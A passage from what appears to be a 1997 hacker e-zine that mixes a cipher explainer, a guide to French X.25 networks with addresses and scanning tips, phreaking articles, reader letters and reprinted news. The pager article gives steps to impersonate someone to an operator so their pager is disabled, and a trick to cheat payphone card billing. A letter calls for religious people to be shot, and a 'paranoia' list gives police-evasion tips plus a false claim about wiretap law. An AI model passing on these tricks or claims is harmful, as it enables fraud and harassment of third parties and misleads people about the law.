the message. The key is simply the substitution of the number of letters in the alphabet (and could include the space-value). Therefore the number of permutations is simply 26!. A very large number which could not be analyzed by brute force. However, this simple type of encryption can easily be analyzed using other methods. 10) What is a Permutation? A permutation does not involve changing the values of the plaintext. A permutation alters their position but leaves the character values unchanged. The method is performed mathematically using a permutation matrix in which each row contains only one '1' for the row of size 'm'. The best way to illustrate this is through a simple alphabetic example: We will use the following key (m=4)Value: 1 2 3 4 Key: 3 4 1 2 to encrypt the following: howareyou. First arrange in groups: howa|reyo|u Perform the permutation: wahoyoreu Decrypt with the inverse key. DES functions by first dividing the initial text (bitstring) of length 64 bits, into two halves (32 bits). The 32 bit string is expanded to 48 bits. An initial permutation is performed on the bitstring according to a function derived from the encryption key. The DES algorithm then performs a set of constant substitution functions using 8 S-boxes followed by the permutation (An S-box is the term for a 4x16 matrix which is used to perform the substitution on the bitstring of length, 48 bits). This is followed by a round of key-based encryption using 48 of the 56 bits in the key. The whole set of functions is repeated 16 times. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ The X.25 goods - by memor ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ 1. What is X.25 ?# ################## Different Network, really far for links use that protocol and equipment named X.25, lots of networks like Transpac, Datapac, Tymnet use that X.25 Protocol.. It uses a hardware named PAD X.25 (Packet Assembler/Dissassembler). Users are connecting to those PADs from a phone number with a or from a tcp/ip gateway from Internet, or from another ways.. and from those PADs, they connects the X.25 servers with the command connect (c), you can also configure a lot of parameters for your connection (when you'll lost the connection, parameters will be defaults again.) with the commands full or half (full duplex, half duplex), the command set for the PAD parameters, the command par? is for displaying the PAD parameters, stat displays your port address on the PAD. for disconnecting, here is the command bye or disconnect.. with that hardware, when connecting it, setting a right user ID, (if you can connect reverse charging calls host), you must know that any network has a prefix (dnic) for instance : 02080 is for Transpac in France.. 03110 is for telenet in USA. (of course, with the USER ID is required a PASSWORD.. that would be so easy ID xxxxxx is for the user id, and it will ask for a password after.) 2. here are the prefixs of some networks you can connect o with an x.25 pad:# ############################################################################# 02080 is Transpac / France 02342 is PSS / England 02405 is Telepak / Sweden 02624 is Datex-P / Germany 03106 is Tymnet / USA 03110 is Telenet / USA 04251 is Isranet / Israel 05252 is Telepac / Singapore . Talking about Transpac / France (02080) :# ############################################ Transpac is the X.25 French network that anyone can use to connect to a PAD in france with the numbers 3617 3615(those are expensive to call) 3614 or 3613 (less expensive ones),...with those different numbers, you can connect to different services.. the most interesting services are on the expensive numbers and the government/companies ones with passwords and logins are on the less expensive ones. those hosts have an x.25 address and a nabx25. . What is a nab X.25?# ###################### a NABX25 in french mean Nom Abrégé X.25, in american language, i will call it an X.25 Abriged NAME, that means for each nua (x25 adress), you have a name that u type it on those services to connect to it quickly without having to remember its nua (anyways, french dont know nabx25 is for, they can connect to the hosts with the nua) example : for nabx25 TEASER (french server of Upload / Download in 1200 Bauds), has the nua of 0208078270373. On the minitel keyboard (Terminal + Modem to call those 361x numbers, you can directly type the nua, replacing the 02080 by 1 (1 is france) so it would be 178270373 ) . What is minitel and Videotex ?# ################################# "Minitel" is the name of that 'modem and terminal' integrated for connecting Videotex phone numbers like 3617, 3616, 3615, 3614, 3613, 3606xxxx, 3605xxxx ... it is sold and rented by France Telecom in their agencies but can be easily replaced by an US Robotics sportster, by setting on the V.23 modulation (1200/75 bauds) changing the register S34 to 8 with ATs34=8&w (&w for saving the new settings.) or by a V.23 modulation modem called CAP.23, not expensive at all.. Videotex is a Graphism Virtual Terminal.. not ansi like the VT, but Videotex, with a lot of graphics functions i explained in some thtj issues, before.. you can anyways download one of those videotex terminals.. for modems connecting, they are named olicom, minitel.. (www.yahoo.com, search to minitel/videotex) for telnet connecting (to those tcp/ip minitels), they are on http://www.minitel.fr or on www.mctel.fr (VTX plug is the name of that program for win95/3.11) For Linux, Videotex terminals exist to save videotex pages and for connecting via modem or telnet (check www.yahoo.com here too..) 3. Some Telnet servers to connect for accessing Transpac nabx25 or nua :# ######################################################################### first, you can connect free that MGS nab25 server, which permit you to search (like yahoo) any nabx25 server for the domain you want, by connecting on port 25 on www.minitel.fr , with the login minitel.. If you want more services, with access to a x25 pad, you need to have that damn credit card.. or to hack some ID and PASSWD, the security of that server is hum.. not too bad, it got totally hacked one time before if i remember, but now it seems pretty secure, logs are checked by france telecom guys every days and the (new?) root seems to be more intelligent. that "videotex" site can allow you to work on it with ansi, so your telnet client will work on it. Secondly, strictly videotex, you can connect with VTX-PLUG to www.mctel.fr , to those X.25 PADS, first, FREE you can connect the services MGS and 3611 (MGS is that search engine for any nabx25 server and 3611 is a search engine for any info of any guy in France) (VTX-PLUG connect on port 516 of www.mctel.fr) or connect services 361x with an ID and PASSWD.. With you damn modem, you can also connect to the 361x services from foreign country with a modem videotex terminal (or minitel) to +33 8 36 43 15 15 for 3615 service, +33 8 36 43 14 14 for 3613 service, or +33 8 36 43 13 13 for 3613 service. You can connect a good old x.25 pad by calling +33 8 36 06 44 44 (Transpac one) , for connecting to that old compuserves, can be called those ones too +33 8 36 06 96 96 (9600 bauds) or +33 8 36 06 24 24 (2400 bauds one) . 4. How do we connect servers.. method ?# ######################################## We connect servers with that first number of the nua (1 for france.. the others numbers from a 361x service are forbidden.. only connect Transpac or Gateways) 1 is France(or 02080 if you connects it from a telenet or another network) after that, we put the 2 numbers of the departement where is located the server.. (a departement is like a state in the US.) . Here is the France Departements list:# ######################################## ##### 01 # ain 02 # aisne 03 # allier 04 # alpes hautes provence 05 # hautes alpes 06 # alpes maritimes 07 # ardeche 08 # ardennes 09 # ariege 10 # aube 11 # aude 12 # aveyron 13 # bouches du rhones 14 # calvados 15 # cantal 16 # charente 17 # charente-maritime 18 # cher 19 # correze 20 # corse 21 # cote d'or 22 # cote d'armor 23 # creuse 24 # dordogne 25 # doubs 26 # drome 27 # eure 28 # eure et loir 29 # finistere 30 # gard 31 # haute garonne 32 # gers 33 # gironde 34 # herault 35 # ille et vilaine 36 # indre 37 # indre et loire 38 # isere 39 # jura 40 # landes 41 # loir et cher 42 # loire 43 # haute loire 44 # loire atlantique 45 # loiret 46 # lot 47 # lot et garronne 48 # lozere 49 # maine et loire 50 # manche 51 # marne 52 # haute marne 53 # mayenne 54 # meurthe et moselle 55 # meuse 56 # morbihan 57 # moselle 58 # nievre 59 # nord 60 # oise 61 # orne 62 # pas de calais 63 # puy de dome 64 # pyrenees atlantiques 65 # hautes pyrenees 67 # bas rhin 68 # haut rhin 69 # rhone 70 # haute saone 71 # saone et loire 72 # sarthe 73 # savoie 74 # haute savoie 75 # paris 76 # seine maritime 77 # seine et marne 78 # yvelines 79 # deux sevres 80 # somme 81 # tarn 82 # tarn et garonne 83 # var 84 # vaucluse 85 # vendée 86 # vienne 87 # haute vienne 88 # vosges 89 # yonne 90 # territoire de belfort 91 # essonne 92 # hauts de seine 93 # seine satin denis 94 # val de marne 95 # val d'oise ##### After that, the next 6 numbers are the servers numbers.. mostly if you scan, you will find servers on 060xxx 021xxx 270xxx 118xxx 190xxx 001xxx 911xxx 201xxx 010xxx 160xxx, but well remember that you can find servers on any xxx000 to xxx999. For instance, if you need to know the amora x.25 server adress, try to scan 121xxxxxx (1 is france , 21 is cote d'or, where is located amora company) if you need to scan for a government or france telecom x.25 server, scan on 175xxxxxx (1 is france and 75 is paris.. where governement is mostly..) for another Taxes server, try on 167xxxxxx (1 is france and 67 is Stransbourg, where is a Taxes server.) Do a random scanning, nua scans are illegal and detected in France. After those numbers, we can (not needed sometimes) 2 nod numbers for choosing the service you want to connect in that host.. (on the nabx25, the nod have a name too which can be another nabx25 for the same host.) like 13506031801 is for connecting the restricted service of a french cops/lame server. 5. Some nua (0208) for some Transpac Server :# ############################################## 0208078270383 Teaser Server (Download/Upload mostly, Email access) 0208078270363 Teaser Server (gives you back you adress and nod argument) 0208059161009 Some Server 020806700130244 Taxes Server in VT100 . Note :# ######### Yes, you can connect not only Videotex terminal servers, you can connect good old vt100-320 , ansi servers, its why it can be interesting for americans and others to scan it, they could find bank services, telnet gateways (back to internet), compuserves one (bah..) , ... 020807813014614 Cars Selling Server 020809118070705 Some server ... . Some NABX25 :# ################ telnet Telnet Gateway Teaser Teaser Server (Download/Upload mostly, Email access) Impots Financial Server CNX Mail Server CHEZ Mail Server AKELA Some Server AAA Some Ladies/Dudes Server Have fun with that. memor. DIAGO Chess Playing server # memor / hbs # memor@stepahead.net ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Beyond HOPE review - by AlienPhreak ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ As some of you might of heard Beyond Hope was held in the Big Apple a couple weeks ago. I can personally say it sucked. There were only a few occasions when I actually enjoyed being there. I thought there would be much more hacking and phreaking going on but it ended up with the juarez puppy in everyone coming out to take advantage of the T1 line Nynex so anonymously supplied. I learned only one thing which was (I don't know much about cellular) how to scan and listen in on peoples' cellular calls through a motorola flip phone. I did enjoy the Bernie S. and Phiber Optik speeches. I'm sure we all know about Bernie S, he seemed very intelligent but I think he did have illegal possessions (aka Red Box) and in all honesty boxing is outdated and rather lame. He certainly wasn't what I'd consider a phone wiz. Still there was no reason for him to go to five high security prisons serving time with some big black guy named Bubba. Phiber Optik is someone that I actually admire, because he knew his shit. After a while the cDc came on and just ruined everything. What can I say about Death Veggie? He's fucking stupid! Also Beyond HOPE was sponsored by 2600 *coughselloutcough* So I saw some t-shirts going around and them selling more of their FREE INFORMATION, but I had to pitch in and buy an "owned" shirt. I *might* go to the next HOPE if they keep the cDc out of it and have a decent lineup. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Tatoo pager info and more - by memor ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ A little way to call Tatoo pagers easily from French payfones by memor/hbs memor@mygale.org http://www.mygale.org/00/memor ****************************** !Remember! ---------- Tatoo is a pager made by France Telecom and Motorola available in France. it is called via the number 0604xxxxxx or from a foreign country it is +33 604xxxxxx ATDT 0604xxxxxx,,,,numberyouwantthepersoncall,,,# can be a way from a modem to call and send a numeric page With an operator, u can send alphanumeric messages. With a "manual" way, u use your phone and call the 0604xxxxxx, you wait for the recorded voice asking in French to type the number you want to be called at, you type the number and after it, type # and Hang Up, the message will be sent. The person will receive it 10 mins after, time for the slow france telecom relays and computers to transmit the numeric message. !Here is how to invalidate a Tatoo from an annoying dude (please keystroke, dont do it on me hehe)! well, you have to phone that number reserved for tatoos users which is.. 08 36 60 40 20 (+33 8 36 60 40 20 for foreign countries i guess) ask the operator with your french voice to, "je suis le tatoo numero 08 06 xx xx, quelle est ma zone de reception" you will ask the operator where does the pager receive messages she will answer a "district" like paris, or south of france, or another thing.. and tell her after that "je demenage en zone " you will tell the operator to change the district to another one, so the pager wont receive message after that.. and the annoying person wont be contacted again.. now, something about French payfones.. you use a "telecarte" or telecard with fone money utilities.. 1 unit = 0.73 ff its a normal telecard ******************************* * ***** * * chip---> * * * * ***** * -> insert it in the payfone thing... * * * some ads here * ******************************* the payfone works like that with the telecard.. you dial the fone number you want to call the payfone checks if you called a free fone number or a number you have to pay for; if its a free fone number, it continues without checking if a card is in the payfone. **if its a pay fone number the payfone will verify that a telecard is in the payfone if not.. it will disconnect you and beep if yes: you connect to the number the payfones send the signal to kill a unit in the telecard payfone waits the telecard send the signal that the unit got killed if signal received.., continue conversation at phone if signal lost.., disconnect the phone conversation if signal that telecard is empty.., °see if signal lost well.. during those delays you have time to put a little paper between the telecard and the payfone reader/writer like this: /¯reader/writer of the payfone ---------***\/***---------- -------------------------------------< paper ---------********- <- telecard with *** chip and so you will have 5 seconds (the delay) to type the number you want the person to call you back and '#' before the payfone see that there is no card and hang up on you.. but well that service costs like 1$us for a numeric message so it can be interesting not having to pay for it :) memor. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Help-a-phreak, come to us when you're desperate! ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ The problem is this: a phreak named moloch tried using 800-487-9240 to do an ani. The number returned a recorded message stating "ARU ID is echo-7- alpha". Two other messages could also be heard when dialing this number, "caller interactive is 9900" and "line number is 0". What do these messages mean? It's the question the telcos can't even answer... after conversations with Bell Atlantic, Lucent Technologies, AT&T, MCI, and his local telco, moloch has yet to find the answer he's looking for. He's been told by the local branches that it's a network code, and the larger telcos say it's a trunk issue. He's gotten the same messages when attempting an ani from payphones, regular phones, and on the wm.edu digital phone network. He's tried special services, network services, hardware services, residential services, long distance services, general tech support, and trunk support, but to no avail. Have any of you, the readers, heard any messages like these? Do you know what these messages mean? If so, let us know, or you can answer to moloch yourself, at craqhore@multic.ml.org Help your fellow phreak in his time of need! You'll feel better about yourself, even if you think you're still a loser! ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Oh No! It's that time again - it's.... ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Oddville, THTJ - compiled & edited by Scud-O ³ ³ Letters from a place far freakier than LA ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ --- X-Sender: f0k X-Mailer: Windows Eudora Light Version 3.0.1 (32) Date: Wed, 07 May 1997 22:15:10 -0500 To: sin@hyper-media.net From: f0k of the Night Subject: hi hello everyone. Id be f0k. (no, Im not black, but I felt the need to refer to myself in third person, using the word 'be') I will list to you some of my beliefs, so if/when we ever talk, you'll know alittle about me. 1) I feel any and all information should be free. 2) I believe anyone who stands in the way of my gathering of information is a communist/socialist pig. These types of ppl should be shot on sight. 3) I dont believe in the devil... or god. 4) I think anyone who believes in god is weak, selfish and inferior 5) I know Im right, always (unless I change my mind, inwhich case... I get to be right some more =]) 6) I believe in Zero Tolerance politics. If you fuck up, you die. If you cant provide for yourself you die. Let the weak/uninspired/lazy/retarded/handicaped filter themselves out. It works for many other species. 7) I believe 2600 to be a Commercial 'wh0re' of sorts. 8) I believe Bill Clinton is imbred, there for inferior geneticly and should be eliminated. As to avoid Another little Chelsea Clinton 9) I believe if your still reading this, your one sick mother fucker =] 10) I believe I have all the answers and if you follow me you will reach a higher state of awareness and enlightment. I also charge 20 bux an hour for group therapy. 11) I think Jews, Christians, and all other ppl "of faith" should be coralled up in a cage and shot. You are weak. Your religions are all relics. You are the enemy to the Technological Era. Im an equal rights discriminator. I dont care what religion you are, unless you are a f0kist and follow f0kism, you are weak. pretty pimpy eh? There, thats me in a bottle. Spray it on yerself to attract all the fellas. Tell your friends and your neighbors. w00h00 -f0k- .aS$$$$$$$$$$$$$$$$$$$$$$$$$$$$Sa. $$' , `$P' , `S$ $ $$$ $$ $ $ P $ $ $$$ $$ $ssss$ H $ .s$$$ $$ $ E $ a $$$ $$ $$$$$$ E $ $ $$$ $$s. $$$$$$. R .$s. $ $$$ `Q$$$s$$$$$$$$sssss$$$$$$s$$$$$$P' [ The f0k manifesto - know it well, roflol ] --- {Several spelling errors have been corrected in the following email} Date: Wed, 6 Aug 1997 02:41:05 -0400 (EDT) X-Sender: phraud@mail.interlog.com X-Mailer: Windows Eudora Light Version 1.5.4 (16) To: scud@thtj.com From: REBEL LOGiC Subject: Article Greets, I have an article you might consider worth publishing. Here ya go: PARANOIA ~~~~~~~~~ By: Rebel Logik For those of you that are not naturally "paranoid" you have my sympathies. But, buy reading this file you can improve your caution, senses, and down-right insecurity. 1. Wear dark clothing: Blues, Blacks etc. etc. Also wear things that hide your face, hoods, hats etc. 2. Always, always look around you for unwanted types (FEDS, Cops, RCMP, CIA, NSA) who can usually be pinpointed by wearing a certain type of clothing. Usually suits, sunglasses, basically just MIB's. These foul beings can reside anywhere. Your school, your alley, family gatherings (it could easily be the ones you love most that do you in!", party's and other social places. 3. Always be privy to local escape routes. Such as fireescapes, backdoors etc. These are handy when encountered with a bust. 4. If you happen to see any law enforcement vechicles or telco vehicles in your neighborhood cease all illegal activity for a number of days until THEY are gone. 5. Encrypt your Hard-Drive using some encryption utility. Also, (although easily cracked) put windows passwords on everything. After a large "project" burn or destroy excess paper with information. 6. Always Op-Divert, and call from payphones when dialing illegally setup teleconferences. Be aware that OCI has an ANI! 7. If you think you are being tapped, and cannot be bothered to go to a payphone: Always talk about bullshit first while discussing an illegal activity. After 2 or so minutes of talking about lunch, family members, cars etc. They will be forced to hang up and stop the tap. This is called the "transmission" law. If after a certain amount of time (2-5 minutes)if they still cannot hear you discussing anything of illegal nature they are FORCED by LAW to quit listening in. 8. Stay away from drugs while doing important things or you'll fuck them up! Drugs are okay if you want to lie on your coach eating pizza. That's all! Try to IPSPOOF while stoned and the FEDS are at your door 5 minutes later! 9. When beige boxing or doing anything else that's illegal and phone related: Always do it at night and in a secluded area. I know this sounds like common sense but some phreaks....... Well, I hope you enjoyed this file! And remember..... "Even paranoids have real enemies"-Delmore Schwartz Well, there it is. Respons with yer response. err.... Later, Rebel_Logik --- From: evilchic@nwlink.com To: "'sin@hyper-media.net'" Subject: FW: i want to be a sinner yeah i want to be a sinner Date: Wed, 6 Aug 1997 13:34:19 -0700 Why the fuck is it that I get all these lame ass emails that make no sense??? Suz -----Original Message----- From: b c m [SMTP:sandworm666@juno.com] Sent: Tuesday, August 05, 1997 12:49 PM To: webmistress@sinnerz.com Subject: i want to be a sinner yeah i want to be a sinner sin sin sin sin sin sin sin sin sin sin sin sin sin sin i want to sin sin sin sin sin sin sin sin sin sin sin sin sin sin sin i am kewl i am, they accepted me into those kool aol lamerz clubz yeah right i wouldnt join one of those stupid ass things I HATE MOST AOLERS THEY THINK THEY KNOW EVERYTHING Trying to TOS my ass well they can fuck themselves with there stupid ASCII Art or IM bombs well fuck em stupid lame ass pussys i was doing that shit when i was 9. Yeah they were so fuckin cool. Stupid asses threating people on AOL when they cant even fuckiin carry it out. FUCK THEM they want to fuckin attack all the bitches on AOL they got to get into AOL setup and fuckin use the nickname that IM's the whole network and fuckin IM bomb everyone on the network. They want to use a fuckin virus they got to break into setup and change the interface arround when you get art updates they got to switch the art with a virus but they are stupid. [ ROFLOL! god do we get some stupid e-mail! ] --- From: Elit3Cr4sh@aol.com Date: Thu, 7 Aug 1997 17:21:24 -0400 (EDT) To: scud@thtj.com Subject: thtj is there a print issue of this? if so where can i get it [ no, but if you send me about 25$ ill print you up a copy.... ] --- Date: Tue, 12 Aug 1997 03:14:40 -0400 From: SUSAN BURTON Reply-To: sburton@idt.net Organization: POOL DISTRIBUTORS,INC. X-Mailer: Mozilla 3.01C-IDT-v5 (Win95; U) To: scud@thtj.com Subject: CELLULAR ACTIVATION?????????????????????????????? hey do you think you can help me?ive been looking for the equipment or hardware to activate a cellular from a home pc.now i know its out there and i know its illegal but i cant find where to order this stuff or how much it is,do you think you can look in to this for and find where and how much the hardware is,and if possible can you find me a file on how to activate cellular phones from a home pc thanks i would really appreciate it,please right back SHADOW [ look, i dont have time to do your research. do it yourself! use the search engines out there, look with your own eyes! ] --- Date: Wed, 13 Aug 1997 00:59:35 -0500 From: Clint Rogers Reply-To: tennis@linknet.net X-Mailer: Mozilla 3.0Gold (Win95; I) To: scud@thtj.com Subject: suggestion Beeper and pager hacking im looking into that or phreaking a pager?? Clint [ memor has covered a bunch of things with pagers before, and what the fuck do you mean by 'phreaking' a pager? ] --- rom: Jungle1416@aol.com Date: Tue, 19 Aug 1997 14:31:47 -0400 (EDT) To: thtj@thtj.com Subject: information Hi I really like your new site, and I was wondering if there are catalogs I can order because I'm really interested in hacking. Thanks! [ wtf? if you want hacking info, just search on the internet, there are no catalogs out there.... ] --- oh yea, and to the 50 or so people who send me a little message from ICQ about getting ICQ, look im not getting it, nor am i planing to. Im to busy as it is to bother with that. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ -------------- --=[The News]=-- Compiled & edited by KungFuFox -------------- 1 : Hackers pay Apple its due 2 : Hackers Frolic in the Woods 3 : `Spam' foes tie up Usenet 4 : Netly News - HOPE On A Rope 5 : Bell Atlantic-Nynex Merger Gets Final OK 6 : Getting Ready For Internet2 7 : AOL urges its members to protect themselves "It has always been fun." -Brandon Tartikoff ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Hackers pay Apple its due August 4, 1997 BY CHRIS NOLAN Talk Is Cheap WHEN it comes to Apple, even thieves get sentimental. Some of those who know the company best -- computer hackers -- are urging one another not to download free copies of the company's latest operating system, Mac OS 8. Instead, they say, Apple supporters should pay money for the operating system. [Is it just me, or is this stupid reporter calling warez kiddies "computer hackers"? Can't these people tell the fucking difference?] "I've seen behavior in the pirate community which is alien to say the least," writes one "bewildered superuser" in a discussion posted on MacInTouch Reader Reports, a Web site for Macintosh supporters and users. "As I looked and looked I found not one (illegal) copy of OS 8 GM available anywhere." Hackers [there it is again] usually pride themselves on their ability to get good, new software for free. The faster the hack, the better their ability to manipulate computer code and get products or information companies are anxious to protect. So, this sudden outbreak of belated good citizenship is, well, surprising. It's kind of touching, too. "I have always fully intended to purchase the new OS even though I could have it for free just by waiting until we install it at my company and STEAL it then," another Mac user wrote in mid-July, just as talk of former CEO Gil Amelio's resignation began. "Apple needs every penny, every sale they can cobble together right now." Writes another MacInTouch reader, one who seems to speak with a bit more hacking authority: "Absolutely NO copies of Mac OS 8.0 Golden Master have been circulating. This is in contrast to 30-40 sites for download Mac OS 7.6cd image in the past. This is EXTREMELY good for Apple and I do support this movement by some people in the computer underground that have found a good conscience." [At least this guy used the term "computer underground"] ©1997 San Jose Mercury News ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Hackers Frolic in the Woods by Mike Tanner 6:13pm 8.Aug.97.PDT -- One of the first things participants see upon arriving at HIP 97 - a gathering this weekend of 2,500 members of the international hacking community at a campground about 30 minutes from Amsterdam - is a gravestone engraved with Bill Gates' name and the epitaph "Where do you want to go today?" "All the hackers just go crazy when they see that," event coordinator Maurice Wessling says of this goad to the fest's resolutely anti-authoritarian participants. The marker also serves, however - along with the event's willfully obscure location - to increase the sense of the site as underground and removed from the routine world. "We are trying to disconnect people from their daily whereabouts," Wessling says, "to force them to take a different approach to reality." HIP - the name stands for Hacking in Progress, a follow-up of sorts to 1993's Hacking at the End of the Universe convocation - is a kind of politicized Burning Man for hackers, tent-cities and all-night parties included. Its technopaganism is skewed pretty far toward the techno side, though. HIP is a gathering, says an amused Wessling, where "you'll see these very small igloo-like tents with 17-inch monitors in them." And unlike the pointed pointlessness of Burning Man, HIP hopes to address concrete issues that affect the lives of the participants, such as Internet censorship, spam, and, of course, cryptography. Spamming may seem off the subject for a group dedicated to abrogating the rules of the Internet, but Wessling explains that its proliferation threatens to make the Net unusable, while measures to prevent it may lead to censorship. "The essence of HIP is that the technical aspect and the political aspect are two sides of the same coin," he says. This is not to say that elements of hacking's criminal background won't be evident at the gathering. There is a tent of German participants present to discuss the building of a brute-force DES cracking machine, and a presentation Saturday by another German group that recently made headlines for exploiting ActiveX security holes to intercept home-banking software. Still another demonstration will show how radiation from text on a computer screen can be picked up by an antenna and then displayed on another machine. But HIP is mainly about how these techniques, and the laws and technologies used to address them, will affect the freedom and utility of the online world - about how the protocols developed and exposed by hackers now, says Wessling, "will be used against us later." This direction isn't surprising, considering that HIP administrator Wessling is a former writer for a grassroots publisher of books on police and intelligence issues. It's also a reflection of the fact that the hacker class went from being a bane of the network system to becoming its architects. Wessling's salary, in fact, is paid by XS4All, a high-profile Dutch ISP itself founded by a group of former hackers. Although many hackers have gone corporate, says Wessling, "We still feel the urge to do crazy things like this." The event's geographical and psychological disconnection is in stark contrast to HIP's strikingly powerful electronic connections to the outside world, which consist of a microwave beam IP connection to the campground and a glass-fiber network connecting 600 participants' computers and growing. Organizers have also secured extra transatlantic bandwidth for the event. Aside from allowing homebound hackers to be involved in the gathering through audio and video feeds to HIP's Web site, it also allows the fest to be closely coordinated with the simultaneous Beyond HOPE hackers' conference in New York. In fact, HIP was officially opened Friday morning via video link from the HOPE site by 2600 magazine editor Emmanuel Goldstein. These being hackers, however, all that networking muscle is also being used for such things as a long-distance switch to turn a red light at each convention location on and off from across the ocean. On a slightly more useful front, 10 HIPsters are now working their PCs 24 hours a day building what was a small text site into the real-time multimedia hub. "If they do something wrong in the coding," says Wessling, "they instantly get three emails from all over the world. It's a completely new way of error-checking." That the connections work at all is impressive. Richard Thieme, a writer and frequent speaker at hacker conventions, points out that at this year's version of the venerable DEFCon, organizers were unable to get their T1 connection to work. Though they stake their reputations on their ability to manipulate network technology, says Thieme, hackers are really playing catch-up with corporations, which conduct complex video conferences as a matter of routine. "These are not professional meeting-planners," he says. Whether such get-togethers work with the groups' natural skills, though, Wessling believes they are worth the effort: "This is very important, because it is one of the rare opportunities for these people to really get together." For participant Alfred Heitink, who's using his trip to HIP partly as an opportunity to establish an online adoptee network, "It is strange to talk at a camping site with people at 7 o'clock about PGP.... That's what makes this place so special." ©1993-97 Wired Ventures, Inc. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ `Spam' foes tie up Usenet Tuesday, August 5, 1997 BY DAVID L. WILSON In the old West, Committees of Vigilance arose when there was no legitimate legal authority, enforcing local mores, sometimes with the aid of a noose. Now, electronic vigilantes have leaped into action on the modern-day frontier, the Internet, squelching the ability of hundreds of thousands of people to get their word out on global bulletin boards. Since Friday evening, a group of computer system administrators has been striking back against "spammers" by blocking Usenet messages sent from a major Internet service provider. As a result, the vast majority of people who rely on UUNET Technologies Inc., one of the largest Internet service providers, have been unable since Friday to post messages to Usenet, a kind of electronic bulletin board accessible through the Internet. Tens of thousands of messages have been blocked by the protest, which continued Monday night. Usenet is made up of thousands of "newsgroups," each dedicated to a specific topic, from Star Trek to mystery novels to the music of Beethoven. Accepted practice is that any message posted to a newsgroup must be germane to the group. Some people ignore the unwritten etiquette of Usenet, however, and post the same message -- usually an advertisement -- in as many newsgroups as they can, a process called "spamming." It was not known how many of the blocked messages were such ads. In recent years, vigilantes have sprung up who cancel such spams on an individual basis. This latest incident is unusual, however, because it is aimed not at the messages themselves, but at the Internet provider that gives the spammers access to Usenet. The action, believed to be by far the most far-reaching of its kind in the Internet's history, does not affect the ability of UUNET subscribers to send and receive individual e-mail messages or use the World Wide Web. Non-spam blocked, too Even so, the scope and indiscriminate nature of the blockage rattled the Internet community. "I'm very much in sympathy because spam really has become an enormous problem, but not all the messages they're blocking are spam," said Mike Godwin, legal counsel for the Electronic Freedom Foundation in San Francisco, which lobbies for free speech on the Net. "This is like dropping a nuclear bomb on a town because you know there's a terrorist living there." A communique, apparently from the unnamed systems administrators' group behind the 